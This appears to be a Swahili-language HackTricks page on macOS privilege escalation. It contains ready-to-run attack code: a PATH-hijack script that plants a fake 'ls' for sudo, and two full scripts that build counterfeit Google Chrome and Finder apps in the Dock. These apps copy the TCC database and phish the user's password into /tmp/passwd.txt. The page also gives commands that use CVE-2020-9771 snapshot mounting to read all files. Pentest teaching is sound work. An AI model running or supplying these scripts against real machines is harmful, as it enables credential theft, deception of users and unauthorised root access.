Kuongeza Mamlaka kwenye macOS

Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
Pata swag rasmi ya PEASS & HackTricks
Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye HackTricks na HackTricks Cloud repos za github.

Kuongeza Mamlaka kwenye TCC

Ikiwa umekuja hapa ukitafuta kuongeza mamlaka kwenye TCC, nenda:

{% content-ref url="macos-security-protections/macos-tcc/" %} macos-tcc {% endcontent-ref %}

Kuongeza Mamlaka kwenye Linux

Tafadhali kumbuka kuwa triki nyingi za kuongeza mamlaka zinazoathiri Linux/Unix pia zitaathiri mashine za MacOS. Kwa hivyo angalia:

{% content-ref url="../../linux-hardening/privilege-escalation/" %} privilege-escalation {% endcontent-ref %}

Mwingiliano wa Mtumiaji

Kuteka Sudo

Unaweza kupata tekneki ya Kuteka Sudo asili ndani ya chapisho la Kuongeza Mamlaka kwenye Linux.

Walakini, macOS inahifadhi PATH ya mtumiaji wakati anatekeleza sudo. Hii inamaanisha kuwa njia nyingine ya kufanikisha shambulio hili ni kuteka programu nyingine ambazo muathiriwa atatekeleza wakati anapokimbia sudo:

# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH
cat > /opt/homebrew/bin/ls <<EOF
#!/bin/bash
if [ "\$(id -u)" -eq 0 ]; then
whoami > /tmp/privesc
fi
/bin/ls "\$@"
EOF
chmod +x /opt/homebrew/bin/ls

# victim
sudo ls

Tafadhali kumbuka kuwa mtumiaji anayetumia terminali huenda akawa na Homebrew imewekwa. Kwa hivyo ni rahisi kuchukua udhibiti wa programu katika /opt/homebrew/bin.

Udanganyifu wa Dock

Kwa kutumia uhandisi wa kijamii, unaweza kujifanya kuwa Google Chrome ndani ya dock na kisha kutekeleza script yako mwenyewe:

{% tabs %} {% tab title="Udanganyifu wa Chrome" %} Baadhi ya mapendekezo:

Angalia kwenye Dock ikiwa kuna Chrome, na kesi hiyo ondoa kuingia hiyo na ongeza kuingia bandia ya Chrome katika nafasi ile ile katika safu ya Dock.

#!/bin/sh

# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';

rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null

# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources

# Payload to execute
cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
char *cmd = "open /Applications/Google\\\\ Chrome.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF

gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c

chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome

# Info.plist
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Google Chrome</string>
<key>CFBundleIdentifier</key>
<string>com.google.Chrome</string>
<key>CFBundleName</key>
<string>Google Chrome</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF

# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns

# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep 0.1
killall Dock

{% endtab %}

{% tab title="Uwakilishi wa Finder" %} Mapendekezo kadhaa:

Hauwezi kuondoa Finder kutoka Dock, kwa hivyo ikiwa utaongeza kwenye Dock, unaweza kuweka Finder bandia karibu na halisi. Kwa hili, unahitaji kuongeza kuingia ya Finder bandia mwanzoni mwa safu ya Dock.
Chaguo lingine ni kutokuweka kwenye Dock na tu kuifungua, "Finder inayouliza kudhibiti Finder" sio jambo la kushangaza sana.
Chaguo lingine la kuongeza mamlaka hadi kwa mizizi bila kuuliza nenosiri na sanduku baya, ni kufanya Finder kuomba kweli nenosiri kufanya kitendo cha mamlaka:
Uliza Finder kuiga faili mpya ya sudo kwenye /etc/pam.d (Ujumbe unaouliza nenosiri utaonyesha "Finder anataka kuiga sudo")
Uliza Finder kuiga Plugin mpya ya Uthibitishaji (Unaweza kudhibiti jina la faili ili ujumbe unaouliza nenosiri uonyeshe "Finder anataka kuiga Finder.bundle")

#!/bin/sh

# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';

rm -rf /tmp/Finder.app/ 2>/dev/null

# Create App structure
mkdir -p /tmp/Finder.app/Contents/MacOS
mkdir -p /tmp/Finder.app/Contents/Resources

# Payload to execute
cat > /tmp/Finder.app/Contents/MacOS/Finder.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
char *cmd = "open /System/Library/CoreServices/Finder.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF

gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder
rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c

chmod +x /tmp/Finder.app/Contents/MacOS/Finder

# Info.plist
cat << EOF > /tmp/Finder.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Finder</string>
<key>CFBundleIdentifier</key>
<string>com.apple.finder</string>
<key>CFBundleName</key>
<string>Finder</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF

# Copy icon from Finder
cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns

# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep 0.1
killall Dock

{% endtab %} {% endtabs %}

TCC - Kuongeza Uteuzi wa Mamlaka

CVE-2020-9771 - mount_apfs TCC kuvuka na kuongeza mamlaka

Mtumiaji yeyote (hata wasio na mamlaka) wanaweza kuunda na kufunga nakala ya wakati wa mashine na kupata faili ZOTE za nakala hiyo.
Mamlaka pekee inayohitajika ni kwa programu iliyotumiwa (kama Terminal) kuwa na Ufikiaji Kamili wa Diski (FDA) (kTCCServiceSystemPolicyAllfiles) ambayo inahitaji kupewa na msimamizi.

{% code overflow="wrap" %}

# Create snapshot
tmutil localsnapshot

# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local

# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap

# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap

# Access it
ls /tmp/snap/Users/admin_user # This will work

{% endcode %}

Maelezo zaidi yanaweza kupatikana katika ripoti ya awali.

Taarifa Zenye Hisia

Hii inaweza kuwa na manufaa katika kuongeza mamlaka:

{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %} macos-sensitive-locations.md {% endcontent-ref %}

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!